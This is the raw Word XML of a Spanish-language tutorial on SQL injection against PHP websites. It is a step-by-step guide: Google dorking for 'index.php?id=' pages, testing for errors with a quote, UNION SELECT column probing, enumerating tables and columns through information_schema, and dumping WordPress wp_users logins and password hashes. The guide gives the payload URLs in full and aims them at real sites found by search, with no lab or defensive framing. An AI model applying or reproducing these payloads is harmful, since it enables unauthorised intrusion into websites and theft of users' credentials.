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2F61" w:rsidRDefault="006A7BF0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  <w:r w:rsidRPr="006A7BF0"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  <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Primera fase</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7BF0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Un ejemplo de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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como</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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buscar en Google</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7BF0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1)</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7BF0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6A7BF0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Nos dirigimos a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A7BF0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pagina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A7BF0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 de Google y en el buscador colocamos esto</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7BF0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id = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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?</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7BF0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Nota: Actualmente Google ha actualizado su buscador, ha mejorado sus herramientas, y la interfaz </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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grafica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A7BF0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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A7BF0" w:rsidRDefault="006A7BF0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BBC3E4A" wp14:editId="7FD55E18">
            <wp:extent cx="4461510" cy="509639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567" r="53326"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4466099" cy="51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¿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Como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saber si la página es vulnerable?</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43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Bastante sencillo, tan solo colocar una '</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:i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i/>
          <w:iCs/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(Comillas, coma, punto, cualquier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>caracter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)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al final de la variable es decir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/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index.php?id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=28'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nos deberá marcar un error más o menos así (Puede variar los errores, pero el más común entre ellos es este):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRPr="00876E43" w:rsidRDefault="00876E43">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF3FC"/>
        </w:rPr>
        <w:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRDefault="00876E43">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E00DC92" wp14:editId="0343DBEB">
            <wp:extent cx="5998579" cy="1547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2371"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6009424" cy="155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lang w:val="es-ES"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</w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Explotando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> el Bug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r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</w:rPr>
        <w:t xml:space="preserve">Segunda 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</w:rPr>
        <w:t>fase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Un ejemplo sencillo de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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como</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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empezar la inyección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tenemos lo siguiente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/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index.php?</w:t>
      </w:r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id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=45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ahora antes de la variable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(28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)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 después del signo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(=)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agregaremos el signo de menos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(-)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deberá quedar así:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRDefault="00876E43">
      <w:pP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</w:pP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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w: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index</w:t>
      </w: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.php?</w:t>
      </w:r>
      <w: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index</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=-230</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r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y agregamos el</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/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 xml:space="preserve">union y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r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y empezamos a partir del</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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numero</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r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o el</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/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numero 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRDefault="00876E43">
      <w:pP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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12DC135E" wp14:editId="2466623C">
            <wp:extent cx="5612130" cy="3039745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E43">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRDefault="00876E43">
      <w:pP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</w:pP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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w: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index</w:t>
      </w:r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.php?</w:t>
      </w:r>
      <w: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index</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00876E43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=-230+union+select+1,2,3--</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/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 </w:t>
      </w:r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 xml:space="preserve">(Es importante poner la coma entre cada </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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numero</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00876E43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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRDefault="00876E43">
      <w:pP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</w:pPr>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRPr="00876E43" w:rsidRDefault="00876E43">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pP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lastRenderedPageBreak/>
        <w:t>¿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Como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sabre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si el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numero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de la columna es vulnerable?</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43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Al momento que veas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uno o más números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en la web y que no haya un error quiere decir que le hemos dado a la columna vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRDefault="00876E43">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CA3866C" wp14:editId="7E44DD19">
            <wp:extent cx="5612130" cy="26670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2262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lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRPr="00876E43" w:rsidRDefault="00876E43" w:rsidP="00876E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u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tercera fase</w:t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Sacando nombre de las Tablas</w:t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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Desde la barra de direcciones remplazamos</w:t>
      </w:r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el numero 2 </w:t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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>por</w:t>
      </w:r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group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman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) </w:t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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>debe quedar algo así:</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRPr="00876E43" w:rsidRDefault="00876E43" w:rsidP="00876E43">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FC"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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/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index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.php?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id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=-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2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30+union+select+1,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group_concat(table_name)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,3,4,5+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from+information_schema.tables--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRDefault="00876E43">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1594FCBA" wp14:editId="6AFC0F4C">
            <wp:extent cx="5612130" cy="3039745"/>
            <wp:effectExtent l="0" t="0" r="762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 nos da como resultado todos los nombres de las tablas que existen en la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Base de </w:t>
      </w:r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datos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.</w:t>
      </w:r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lastRenderedPageBreak/>
        <w:t>Como se ve en la imagen, tenemos como resultado los nombres de las tablas. Pero hay un pequeño problema, el tamaño de la página nos limita a que solo veamos una cierta cantidad de numero de tablas (Por naturaleza)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.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Sin embargo, no hay nada que nos impida, pues gracias a una función de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SQL podemos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utilizar otra alternativa, en este caso será la opción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limit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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que nos permitirá limitar el rango de registro, y así poder acceder a la tabla del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administrador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o la de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usuarios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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43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En este caso hay que hacer lo siguiente, quitamos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group_concat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()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 solo dejamos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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 al final de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information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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agregamos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+limit+1,1--</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43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así quedará la url:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRDefault="00876E43">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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/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index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.php?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id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=-230+union+select+1,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table_name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,3,4,5+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from+information_schema.tables+limit+1,1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—</w:t>
      </w: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0ED6EE56" wp14:editId="27C6F3F8">
            <wp:extent cx="5612130" cy="3039745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Y vamos de 10 en 10 hasta encontrar la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table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que deseamos</w:t>
      </w:r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,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admin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, administrador, usuarios,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users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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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usuaris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00876E43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,</w:t>
      </w:r>
      <w:r w:rsidRPr="00876E43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876E43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etc.. (Puede variar los nombres de las tablas y columnas por el idioma)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRDefault="00876E43">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pP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  <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A57B2AA" wp14:editId="1F53E503">
            <wp:extent cx="5612130" cy="264795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889"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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E43" w:rsidRDefault="00876E43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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Y encontramos la tabla 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wp_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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donde 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posiblmente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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se encontrará el usuario y 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password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRPr="00876E43" w:rsidRDefault="007F5B66">
      <w:pP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</w:pP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Una </w:t>
      </w:r>
      <w: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vez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 que tengamos el nombre de la tabla que queremos y es en este caso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admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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vamos a convertirla en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ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66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les dejo la herramienta online para el conversor de</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66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String</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> a ASCII |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hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="007F5B66">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="0FADE5"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://easycalculation.com/ascii-hex.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F5B66" w:rsidRDefault="007F5B66">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00876E43" w:rsidRDefault="007F5B66">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="591A0E0C" wp14:editId="13DDFE3E">
            <wp:extent cx="2861310" cy="224572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42" t="5327" r="40258" b="32944"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2867507" cy="225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B66" w:rsidRDefault="007F5B66">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F5B66" w:rsidRDefault="007F5B66">
      <w:pP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</w:pPr>
      <w:r w:rsidRPr="007F5B66">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Extracción de columnas de la tabla</w:t>
      </w:r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br/>
      </w:r>
      <w:r w:rsidRPr="007F5B66"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  <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cuarta fase</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66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7F5B66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Ahora modificamos nuestra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> algo que quede así (incluyendo</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/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wp_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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,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pero convertida en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ASCII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):</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66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7F5B66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/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index</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66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.php?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id</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66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=-230+union+select+1,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2,</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66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group_concat(column_name)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66"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+from+information_schema</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66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.columns+where+table_name=char(</w:t>
      </w:r>
      <w:r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119,112,95,117,115,101,114,</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66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115</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)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  <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B66" w:rsidRDefault="007F5B66">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23EC0BBF" wp14:editId="2CC3F68A">
            <wp:extent cx="5612130" cy="3039745"/>
            <wp:effectExtent l="0" t="0" r="762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66" w:rsidRDefault="007F5B66">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="007F5B66">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Extracción de usuario y contraseña</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36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7F5B66">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Quinta fase</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/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Esta parte es la más fácil, ya que lo anterior era lo complicado. Supongamos que ya sabemos los nombres de la tabla en este caso es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wp_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 las columnas que nos interesan son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user_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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y</w:t>
      </w:r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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>user_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F5B66">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/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 </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5B66">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="5E6A72"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(contraseña), ahora hay que extraer los datos de esas dos columnas y para eso hacemos lo siguiente.:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B66" w:rsidRDefault="007F5B66">
      <w:pP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</w:pP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/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index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.php?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id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=-230+union+select+1,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2,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group_concat(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user_login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,0x3a,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user_pass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)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+from+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wp_users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF3FC"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B66" w:rsidRPr="007F5B66" w:rsidRDefault="007F5B66">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AA0EEB7" wp14:editId="1181A114">
            <wp:extent cx="5612130" cy="3039745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5B66" w:rsidRPr="007F5B6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BF0"/>
    <w:rsid w:val="00115794"/>
    <w:rsid w:val="006A7BF0"/>
    <w:rsid w:val="007F5B66"/>
    <w:rsid w:val="00876E43"/>
    <w:rsid w:val="00CA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C98A9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5AF66DC1-15E6-40CE-BB14-ACF402C16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A7BF0"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007F5B6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8073">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="600"/>
          <w:marRight w:val="600"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="3" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="8" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="3" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="8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easycalculation.com/ascii-hex.php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548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  Daniel Villalba    Lynch</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>German   Daniel Villalba    Lynch</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-16T01:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-16T02:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>